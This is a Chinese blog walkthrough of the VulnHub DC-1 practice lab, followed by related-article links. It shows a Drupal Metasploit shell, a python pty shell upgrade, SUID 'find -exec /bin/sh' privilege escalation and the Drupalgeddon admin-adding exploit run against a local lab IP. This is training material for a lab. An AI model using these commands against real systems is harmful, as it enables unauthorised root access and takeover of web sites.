vulnhub靶场 DC-1

最新推荐文章于 2024-01-26 13:16:32 发布
最新推荐文章于 2024-01-26 13:16:32 发布
阅读量248 收藏
点赞数
文章标签: 服务器 debian 运维
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_52221158/article/details/126561577
版权

下载地址

链接:https://pan.baidu.com/s/1W3bEDx219EEsnGFUnDX3-Q 
提取码:pm7e

用vnware导入ova文件 ,注意使kali和靶机都为nat网络模式

 开始,显示页面不能进行任何操作

准备

先查看kali的ip

nmap扫描找到靶机ip 

查看靶场开放端口

 

浏览器访问ip,看到Drupal

 

测试

使用msf看是否有利用的攻击脚本,输入msfconsole启动

 查找和drupal有关的,尽量选择新日期较优秀的,使用序号1的,反弹shell

 查看需要设置的选项

可以看到目前只需要设置rhosts即可,即靶场ip,然后进行exploit

 输入shell

再利用python固定语句进行交互式访问

python -c 'import pty; pty.spawn("/bin/bash")'

判断权限,为低权限账号

 

 提权

suid 提权,就是设置的一些可以root运行的

固定语句查询

find / -user root -perm -4000 -print 2>/dev/null

 注意目前能用来提权的可行性文件,我们使用find提权

find / -name cron.php -exec "/bin/sh" \; 


//   路径含有cron.php文件,   \为转义字符

 

可以看到我们已经为root权限

 

查找和flag有关的文件

 

 查看,发现已经完成

drupal经典漏洞

CVE2014-3704,添加管理员账号,适合7.0-7.31版本

Drupal 7.0 < 7.31 - 'Drupalgeddon' SQL Injection (Add Admin User) - PHP webapps Exploit

 下载完为一个py文件,在下载文件的目录下,下面为一些参数提示

运行 python 34992.py -t http://192.168.80.129 -u 123 -p 123  

python 34992.py -t http://192.168.80.129 -u 123 -p 123

复制下方的url,打开浏览器

尝试登录,成功登录后台就已经获取了管理员权限

 完整步骤-从flag1找到flag5

结合本文章和参考:【基础向】超详解vulnhub靶场DC-1_哔哩哔哩_bilibili

安全的小白
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
Vulnhub靶场题解.html
08-12
Vulnhub靶场题解.,适合渗透测试人员学习交流
VulnHub 渗透测试靶场 -DC-9
11-21
DC-9 是另一个专门建造的易受攻击的实验室,旨在获得渗透测试领域的经验。 这一挑战的最终目标是扎根并读取唯一的标志。 Linux 技能和熟悉 Linux 命令行是必须的,还有一些基本渗透测试工具的经验。 对于初学者来说,Google 可以提供很大的帮助,但您可以随时发推文@DCAU7 寻求帮助,以帮助您重新开始。但请注意:我不会给你答案,相反,我会给你一个如何继续前进的想法。
phpstudy+靶场sqli-labs-master下载
11-08
phpstudy+靶场sqli-labs-master下载
靶场系列之DC-1.md
07-26
靶场系列之DC-1.md
VulnHub靶场MONEYBOX:1
01-05
VulnHub是一个提供各种漏洞环境的靶场平台,供安全爱好者学习渗透测试使用。MONEYBOX:1是VulnHub上的一个靶场环境,提供了虚拟机镜像,可以在本地安装并尝试完成渗透测试任务。这个靶场类似于一个游戏,需要逐步完成各种挑战,提权、漏洞利用、代码审计等,最终获得root权限并发现flag。 在MONEYBOX:1靶场中,攻击准备和信息收集是非常重要的步骤。可以使用Kali中的工具如netdiscover来发现目标主机,使用nmap进行端口扫描和版本检测,使用dirb进行目录扫描等。 安装VulnHub靶场MONEYBOX:1需要先下载安装包,然后解压并在虚拟机中打开。在安装过程中,需要配置网络和端口转发等设置,以便在本地环境中运行虚拟机并连接到靶场。 总之,VulnHub靶场MONEYBOX:1是一个非常实用的学习资源,可以帮助安全爱好者提高渗透测试和漏洞利用的技能。但是需要注意的是,靶场环境仅供学习和研究使用,不得用于非法入侵和攻击他人系统。
渗透靶场 Vulnhub:DC-1复现
qq_47168481的博客
09-02 600
渗透靶机DC-1复现过程 下载完靶机后,设置为NAT模式,即可开始测试。 相关过程: 信息搜集 msf的漏洞探测 msf的漏洞利用 提权 信息搜集 1.首先利用nmap探测目标机位置: nmap -A 192.168.178.100/24 获知: 靶机ip地址:192.168.178.141 获取靶机指纹相关信息: 获知: 靶机使用的cms是Drupal 7 漏洞探测: 方法一:利用nmap的脚本探测出漏洞的CVE编号,在msf中查找相关漏洞 方法二:使用msf直接查找网站站点cms漏洞加以利用 方
Vulnhub-DC-1实战靶场
ierciyuan的博客
10-12 2427
本次靶场实战涉及信息收集、漏洞查找与利用、getshell、数据库渗透、密码破解、linux提权,并找到官方设计的5个flag。
Vulnhub靶场练习 DC-1
m0_64227134的博客
04-23 486
Vulnhub 靶场练习 DC-1
vulnhub靶场DC-1 思路详解
weixin_62369433的博客
09-24 452
快速入门学习vulnhub靶场
XXE漏洞详解【内含vulnhub靶场XXE Lab:1详解】
07-30
内含xxe漏洞原理,以及该漏洞的多种利用方式,同时根据八个具体案例详细描述漏洞的利用方式。 【想要搭建vulnhub靶场可关注博主,然后私聊我哦】 同时内含vulnhub中xxe lab:1靶场的过关记录 渗透思路: 由于网站信息什么都没有给出,首先判断靶场搭建的ip【实在判断不出来可以nmap扫一下,找到开放80端口的ip】 得到ip后,可以使用burpsuite进行目录爬取,得到sitemap后就可以对相应可疑站点进行测试,由于该靶场为xxe漏洞靶场,找到对应的登录页面抓包进行构造payload进行测试,其中具体构造payload并找到对应flag见pdf所示。 资源使用人群:前后端有一定了解,具备一些安全方面知识,但不多,保姆级教程,只要你想学就能学会。 工具:忍者渗透测试系统【burpsuite,nmap,base32解密,php在线运行环境,base64解密,cmd5在线平台】
VulnHub20230718最新全部靶场详情 - 共701个靶场信息
07-18
由于本人最近打靶,但是【VulnHub】网站访问总是有些显示问题,靶场信息查找也很不方便,所以本人总结了【VulnHub】上面所有靶场的全部基本信息,方便各位按照自己需求进行搜索查看
Vulnhub靶场题解
08-24
介绍靶场的习题解答技巧,由红日团队精心编制,红日团队凭借多年经验于本文档
vulnhub靶场库中 DC:1
07-06
针对初学者对vulnhub靶场库中DC:1有一定的认知和了解,你会学到一些东西的
VulnHub渗透测试靶场- DC-8
11-21
DC-8 是另一个专门建造的易受攻击的实验室,旨在获得渗透测试领域的经验。 这个挑战有点像实际挑战和“概念验证”,即在 Linux 上安装和配置的双因素身份验证是否可以防止 Linux 服务器被利用。 此挑战的“概念验证”部分是由于 Twitter 上提出的有关双因素身份验证和 Linux 的问题以及 @theart42 的建议而产生的。 这一挑战的最终目标是绕过双因素身份验证、获得 root 权限并读取唯一的标志。 除非您尝试通过 SSH 登录,否则您可能甚至不知道已经安装和配置了双因素身份验证,但它确实存在并且正在发挥作用。 Linux 技能和熟悉 Linux 命令行是必须的,还有一些基本渗透测试工具的经验。 对于初学者来说,Google 可以提供很大的帮助,但您可以随时发推文@DCAU7 寻求帮助,以帮助您重新开始。但请注意:我不会给你答案,相反,我会给你一个如何继续前进的想法。
vulnhub靶场DC-3
qq_58091216的博客
01-08 1086
如果您的网站正在运行 Joomla,您可以对您的网站使用 JoomScan 实用程序来发现漏洞或仅提供有助于攻击您网站的一般信息。漏洞扫描器(JoomScan)是一个开源项目,其主要目的是实现漏洞检测的自动化,以增强Joomla CMS开发的安全性。与以前的 DC 版本一样,这个版本是为初学者设计的,尽管这一次只有一个标志,一个入口点,根本没有任何线索。Linux 技能和对 Linux 命令行的熟悉是必须的,对基本渗透测试工具的一些经验也是必须的。我们可以看到用户名爆破出来了,密码是加密的,我们进行解密。
vulnhub靶场DC-1
最新发布
qq_34942239的博客
01-26 726
perm -4000: 指定查找具有 Setuid 位(SUID)设置的文件。SUID 位是一种权限位,当文件被设置了 SUID 位时,它将在执行时获得与所有者相同的权限。这里的 -4000 表示查找具有 SUID 位设置的文件。搜索suid程序:find / -user root -perm -4000 -print 2>/dev/null。不过flag1 和flag2应该就在未提权的目录里面,这个好找,下次一步步找,不要越步。-user root: 指定查找的文件所有者是 root 用户。
vulnhub靶场实战:DC-1
huangyongkang666的博客
04-18 4404
vulnhub实战:DC-1 1.DC-1介绍 DC-1是一个专门构建的易受攻击的实验室,目的是在渗透测试领域获得经验。 它旨在为初学者带来挑战,但它的容易程度将取决于您的技能和知识以及您的学习能力。 要成功完成此挑战,您将需要Linux技能,熟悉Linux命令行以及具有基本渗透测试工具的经验,例如可以在Kali Linux或Parrot Security OS上找到的工具。 有多种方法可以获得root,但是,我包含了一些包含初学者线索的标志。 总共有五个flag,但最终目标是在root的主目录中找到并读取
Vulnhub靶场实战---DC-9
一期一会的博客
12-23 2275
​ 0x00 环境准备 1.官网下载地址: https://www.vulnhub.com/entry/dc-9,412/ 2.下载完成之后直接导入vm,使用NAT模式连接,保持在同一网段 攻击机:kali (192.168.88.130) 靶机:DC-8 (192.168.88.132) 0x01 信息收集 老办法,使用arp-scan -l 找到目标主机,目标主机ip为192.168.88.132 查看开放端口,22端口被过滤,登录80端口查看 nmap -sV -p- -A 192.168.88.
vulnhub靶场通关
09-09
1. 环境搭建:下载靶场环境,并启动靶场环境。 2. 信息收集:通过探测靶机真实IP和开放的端口及服务进行信息收集。 3. 访问web站点:访问web站点并进行网站的扫描和漏洞探测。 4. 利用漏洞:使用Metasploit框架(MSF)...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值